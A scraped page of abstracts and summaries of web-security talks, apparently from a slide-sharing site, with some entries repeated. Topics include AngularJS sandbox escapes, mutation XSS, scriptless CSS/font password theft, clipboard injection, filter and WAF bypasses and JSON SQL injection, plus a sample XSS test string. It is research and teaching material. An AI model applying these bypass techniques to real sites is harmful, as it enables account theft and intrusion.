ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
The OWASP Top 10 provides a list of the 10 most critical web application security risks. How do these relate to AngularJS applications? What security vulnerabilities should developers be aware of beyond XSS and CSRF?
This session will review the OWASP Top 10 with a front-end development focus on HTML and JavaScript. It will look at patterns to implement and others to consider avoiding. We will also explore several built-in features of AngularJS that help secure your application.
This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
This document summarizes a talk given by Gareth Heyes and Mario Heiderich on web security and the PHPIDS project. It describes the early challenges of detecting attacks using simple blacklists and how the project evolved to address increasingly complex obfuscated payloads. Key points discussed include the introduction of a payload canonicalizer to normalize strings before detection, ongoing challenges of new browser behaviors and standards, and the importance of an open community approach to security research.
The document discusses the history and development of the Document Object Model (DOM) from its early implementations in 1995 to modern standards. It outlines key milestones like DOM Level 1 in 1998, the rise of JavaScript frameworks like Prototype, jQuery and MooTools in 2005-2006, and ongoing work by the W3C and WHATWG. The talk will explore security issues that can arise from the DOM's ability to convert strings to executable code and demonstrate an attack technique called DOM clobbering.
The document discusses security issues with AngularJS and summarizes four general attack vectors:
A1: Attacking the AngularJS sandbox by bypassing restrictions on dangerous objects and methods. Early versions had trivial bypasses but later versions required more creative techniques.
A2: Attacking the AngularJS sanitizer, which aims to sanitize HTML strings and remove XSS attacks. There were issues with both an older sanitizer version and the current version.
A3: Attacking the Content Security Policy (CSP) mode in AngularJS.
A4: Attacking vulnerabilities directly in the AngularJS codebase through techniques like sandbox bypasses.
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
- The document discusses scriptless attacks that can bypass traditional XSS defenses like NoScript and XSS filters by leveraging new HTML5 and CSS features.
- It presents several proof-of-concept attacks including using CSS to steal passwords, using SVG fonts to brute force CSRF tokens, and using custom fonts to leak sensitive information like passwords without using JavaScript.
- The attacks demonstrate that even without scripting, features in HTML5 and CSS can be abused to conduct traditional XSS attacks and undermine security defenses, so more work is needed to protect against side-channels and unwanted data leakage from the browser.
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
The clipboard is one of the most commonly used tools across operating systems, window managers and devices. Pressing Ctrl-C and Ctrl-V has become so fundamentally important to productivity and usability that we cannot get rid of it anymore. We happily and often thoughtlessly copy things from one source and paste them into another. URLs into address-bars, lengthy commands into console windows, text segments into web editors and mail interfaces. And we never worry about security when doing so. Because what could possibly go wrong, right?
But have we ever asked ourselves what the clipboard content actually consists of? Do we really know what it contains? And are we aware of the consequences a thoughtless copy&paste interaction can have? Who else can control the contents of the clipboard? Is it really just us doing Ctrl-C or is there other forces in the realm who are able to infect what we believe to be clean, who can desecrate what we trust so blindly that we never question or observe it?
This talk is about the clipboard and the technical details behind it. How it works, what it really contains – and who can influence its complex range of contents. We will learn about a new breed of targeted attacks, including cross-application XSS from PDF, ODT, DOC and XPS that allow to steal website accounts faster than you can click, turn your excel sheet into a monster and learn about ways to smuggle creepy payload that is hidden from sight until it executes. Oh, and we’ll also see what can be done about that and what defensive measures we achieved to create so far.
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
The OWASP Top 10 provides a list of the 10 most critical web application security risks. How do these relate to AngularJS applications? What security vulnerabilities should developers be aware of beyond XSS and CSRF?
This session will review the OWASP Top 10 with a front-end development focus on HTML and JavaScript. It will look at patterns to implement and others to consider avoiding. We will also explore several built-in features of AngularJS that help secure your application.
This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
This document summarizes a talk given by Gareth Heyes and Mario Heiderich on web security and the PHPIDS project. It describes the early challenges of detecting attacks using simple blacklists and how the project evolved to address increasingly complex obfuscated payloads. Key points discussed include the introduction of a payload canonicalizer to normalize strings before detection, ongoing challenges of new browser behaviors and standards, and the importance of an open community approach to security research.
The document discusses the history and development of the Document Object Model (DOM) from its early implementations in 1995 to modern standards. It outlines key milestones like DOM Level 1 in 1998, the rise of JavaScript frameworks like Prototype, jQuery and MooTools in 2005-2006, and ongoing work by the W3C and WHATWG. The talk will explore security issues that can arise from the DOM's ability to convert strings to executable code and demonstrate an attack technique called DOM clobbering.
The document discusses security issues with AngularJS and summarizes four general attack vectors:
A1: Attacking the AngularJS sandbox by bypassing restrictions on dangerous objects and methods. Early versions had trivial bypasses but later versions required more creative techniques.
A2: Attacking the AngularJS sanitizer, which aims to sanitize HTML strings and remove XSS attacks. There were issues with both an older sanitizer version and the current version.
A3: Attacking the Content Security Policy (CSP) mode in AngularJS.
A4: Attacking vulnerabilities directly in the AngularJS codebase through techniques like sandbox bypasses.
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
- The document discusses scriptless attacks that can bypass traditional XSS defenses like NoScript and XSS filters by leveraging new HTML5 and CSS features.
- It presents several proof-of-concept attacks including using CSS to steal passwords, using SVG fonts to brute force CSRF tokens, and using custom fonts to leak sensitive information like passwords without using JavaScript.
- The attacks demonstrate that even without scripting, features in HTML5 and CSS can be abused to conduct traditional XSS attacks and undermine security defenses, so more work is needed to protect against side-channels and unwanted data leakage from the browser.
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
The clipboard is one of the most commonly used tools across operating systems, window managers and devices. Pressing Ctrl-C and Ctrl-V has become so fundamentally important to productivity and usability that we cannot get rid of it anymore. We happily and often thoughtlessly copy things from one source and paste them into another. URLs into address-bars, lengthy commands into console windows, text segments into web editors and mail interfaces. And we never worry about security when doing so. Because what could possibly go wrong, right?
But have we ever asked ourselves what the clipboard content actually consists of? Do we really know what it contains? And are we aware of the consequences a thoughtless copy&paste interaction can have? Who else can control the contents of the clipboard? Is it really just us doing Ctrl-C or is there other forces in the realm who are able to infect what we believe to be clean, who can desecrate what we trust so blindly that we never question or observe it?
This talk is about the clipboard and the technical details behind it. How it works, what it really contains – and who can influence its complex range of contents. We will learn about a new breed of targeted attacks, including cross-application XSS from PDF, ODT, DOC and XPS that allow to steal website accounts faster than you can click, turn your excel sheet into a monster and learn about ways to smuggle creepy payload that is hidden from sight until it executes. Oh, and we’ll also see what can be done about that and what defensive measures we achieved to create so far.
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document provides an overview of HTML5 including its history, current status, implementation in browsers, and both benefits and security issues. It discusses how HTML5 aims to simplify and enhance usability but also introduces new vulnerabilities due to its dynamic nature forcing rapid implementation. While HTML5 enables rich content and interactivity, its inconsistencies and evolving specifications combined with a rush for browser support has resulted in buggy websites and potential for attacks like hijacking forms, stealing data, and bypassing security restrictions.
This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). Exploits discussed SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to lack of documentation and filters, and new vectors are found weekly. Future work proposed a SVG purifier and raising awareness of issues.
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
This document discusses using ES5 capabilities to help mitigate cross-site scripting (XSS) vulnerabilities. It summarizes the history of JavaScript and XSS, current approaches to mitigation, and limitations. It then proposes using ES5 features like Object.defineProperty to prohibit unauthorized access to DOM properties and add monitoring of property access. This could enable intrusion detection and role-based access control without impedance mismatches. Examples show freezing DOM objects to prevent tampering. Limitations include blacklisting and compatibility issues, but the approach aims to detect and prevent XSS at the client level without server-side filtering.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
I thought you were my friend - Malicious MarkupMario Heiderich
The document is a transcript from a talk given by Mario Heiderich at the CONFidence 2009 conference. It discusses various ways that malicious code can be embedded in markup and exploited by browsers, including through techniques like inline SVG, XML namespaces, XUL artifacts, and more. It provides examples of actual malicious code and encourages awareness of legacy browser vulnerabilities as new web standards are developed.
This document discusses cross-site scripting (XSS) attacks and defenses. It describes different types of XSS (persistent, non-persistent, DOM-based), how XSS attacks work, and examples of XSS injection vectors. It also provides recommendations for preventing XSS, including encoding output, sanitizing input, and using features like HttpOnly cookies.
When Ajax Attacks! Web application security fundamentalsSimon Willison
The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
So you thought you were safe using AngularJS.. Think again!Lewis Ardern
The document is a presentation on AngularJS security given by Lewis Ardern. It includes:
- An introduction and biography of the presenter
- An agenda covering AngularJS security protections, issues, third-party libraries, and the future
- A quiz on AngularJS fundamentals
- Explanations of AngularJS security protections like output encoding, SCE, and CSRF protection
- Discussions of potential security issues like template loading, expression injection, and sandbox escapes
- Recommendations for securely implementing AngularJS templates and expressions
This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.
JSON SQL Injection and the Lessons LearnedKazuho Oku
This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which leads to a huge potential vulnerability, the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure DOMinatorPro.
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
Lightning talk I gave at SEC-T spring pub 2016, talking about how to use the "ON DUPLICATE KEY UPDATE" syntax to not only extract but also modify/add information in the database.
The example I brought up was a site that had an SQL Injection in the register page, which could be used to change the admin password without having to crack it.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document provides an overview of HTML5 including its history, current status, implementation in browsers, and both benefits and security issues. It discusses how HTML5 aims to simplify and enhance usability but also introduces new vulnerabilities due to its dynamic nature forcing rapid implementation. While HTML5 enables rich content and interactivity, its inconsistencies and evolving specifications combined with a rush for browser support has resulted in buggy websites and potential for attacks like hijacking forms, stealing data, and bypassing security restrictions.
This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). Exploits discussed SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to lack of documentation and filters, and new vectors are found weekly. Future work proposed a SVG purifier and raising awareness of issues.
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
This document discusses using ES5 capabilities to help mitigate cross-site scripting (XSS) vulnerabilities. It summarizes the history of JavaScript and XSS, current approaches to mitigation, and limitations. It then proposes using ES5 features like Object.defineProperty to prohibit unauthorized access to DOM properties and add monitoring of property access. This could enable intrusion detection and role-based access control without impedance mismatches. Examples show freezing DOM objects to prevent tampering. Limitations include blacklisting and compatibility issues, but the approach aims to detect and prevent XSS at the client level without server-side filtering.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
I thought you were my friend - Malicious MarkupMario Heiderich
The document is a transcript from a talk given by Mario Heiderich at the CONFidence 2009 conference. It discusses various ways that malicious code can be embedded in markup and exploited by browsers, including through techniques like inline SVG, XML namespaces, XUL artifacts, and more. It provides examples of actual malicious code and encourages awareness of legacy browser vulnerabilities as new web standards are developed.
This document discusses cross-site scripting (XSS) attacks and defenses. It describes different types of XSS (persistent, non-persistent, DOM-based), how XSS attacks work, and examples of XSS injection vectors. It also provides recommendations for preventing XSS, including encoding output, sanitizing input, and using features like HttpOnly cookies.
When Ajax Attacks! Web application security fundamentalsSimon Willison
The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
So you thought you were safe using AngularJS.. Think again!Lewis Ardern
The document is a presentation on AngularJS security given by Lewis Ardern. It includes:
- An introduction and biography of the presenter
- An agenda covering AngularJS security protections, issues, third-party libraries, and the future
- A quiz on AngularJS fundamentals
- Explanations of AngularJS security protections like output encoding, SCE, and CSRF protection
- Discussions of potential security issues like template loading, expression injection, and sandbox escapes
- Recommendations for securely implementing AngularJS templates and expressions
This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.
JSON SQL Injection and the Lessons LearnedKazuho Oku
This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which leads to a huge potential vulnerability, the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure DOMinatorPro.
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
Lightning talk I gave at SEC-T spring pub 2016, talking about how to use the "ON DUPLICATE KEY UPDATE" syntax to not only extract but also modify/add information in the database.
The example I brought up was a site that had an SQL Injection in the register page, which could be used to change the admin password without having to crack it.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
This document discusses cross-origin attacks using polyglot files that can be interpreted in multiple formats. Specifically, it examines:
1) Syntax injection attacks where fragments of PDF syntax are injected into HTML pages hosted on vulnerable sites, allowing extraction of sensitive data from the original domain.
2) Content smuggling attacks where an attacker uploads a polyglot file in a benign format (e.g. PDF) that also contains malicious content to a vulnerable site, then embeds it to exploit visitors through content reinterpretation.
3) The potential for these attacks using PDF, which has powerful interactive capabilities, error-tolerant parsing, and ability to issue cross-origin requests like CSRF with cookies
This document discusses bug bounty programs, which pay security researchers monetary rewards for reporting qualifying security bugs to companies. It explains that bug bounties are a cost-effective way for companies to improve security. The document provides tips for getting started in bug hunting, such as practicing skills, reading materials, and thinking logically. Popular bug bounty programs and platforms are also listed.
If You Can't Beat 'Em, Join 'Em (AppSecUSA)bugcrowd
Grant McCracken and Daniel Trauner's presentation on setting up and managing a successful bug bounty program. Having a bug bounty program is one of the most efficient methods of finding security vulnerabilities today. But, as anyone who has tried to run a bug bounty program knows, it's not a trivial undertaking... As professionals who have helped to manage hundreds of bug bounty programs, we're uniquely positioned to provide advice on how to succeed. Whether you're already running a bug bounty program, are looking to run a bug bounty program, or are a researcher, this talk aims to deepen your knowledge of the subject.
Writing vuln reports that maximize payouts - Nullcon 2016bugcrowd
Writing Vuln Submissions that Maximize Your Payouts - presentation given at Nullcon 2016 by Bugcrowd's Kymberlee Price.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
The Game of Bug Bounty Hunting - Money, Drama, Action and FameAbhinav Mishra
The document provides an overview of the game of bug bounty hunting, including a brief history of bug bounty programs, the present state of platforms like HackerOne and BugCrowd, tips for getting started, techniques for finding different types of vulnerabilities, examples of famous bounty submissions, and potential drama one may face. It also includes suggestions for resources, tools, blogs, and people to follow to continue learning and developing skills in bug bounty hunting.
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
As presented at this year's RSA Conference, a 2016 survey of critical infrastructure companies and officials demonstrates that this scenario could be reality. Jay and Julia will take you through the spine-chilling specifics of why the nation's critical infrastructure is at an ever increased risk of cyber attacks as hackers make them their prime target.
[DefCon 2016] I got 99 Problems, but Little Snitch ain’t one!Synack
Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail
The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace allows tracing Objective-C method calls. The document also provides examples of Lua scripts for ChaoticMarch that find and interact with UI elements to automate tasks like filling fields and logging in.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
This document summarizes Stefano di Paola's talk on security issues with JavaScript libraries. It discusses how jQuery's $() method can be considered a "sink" that executes HTML passed to it, including examples of XSS via jQuery selectors and AJAX calls. It also covers problems with JSON parsing regular expressions, AngularJS expression injection, and credentials exposed in URLs. Solutions proposed include validating all input, auditing third-party libraries, and moving away from approaches like eval() that execute untrusted code.
HTML5DevConf 2013 (October): WebGL is a game changer!Iker Jamardo
WebGL is getting everywhere. The recent announcement from Microsoft that Internet Explorer is finally supporting WebGL is just another example of the importance that this technology is getting among web technologies. For the first time, web developers can access complex graphics features that were only available for native game development. But, what are the real advantages of WebGL over other web based games development technologies? What are the different game engines that support it? Is WebGL ready for cross-platform game development? Can only 3D games benefit from WebGL? All these questions and more will be answered in this talk full of code snippets and useful tips that will try to show that the web environment (and specially WebGL) can be great for developing successful games, and could become in a real game changer.
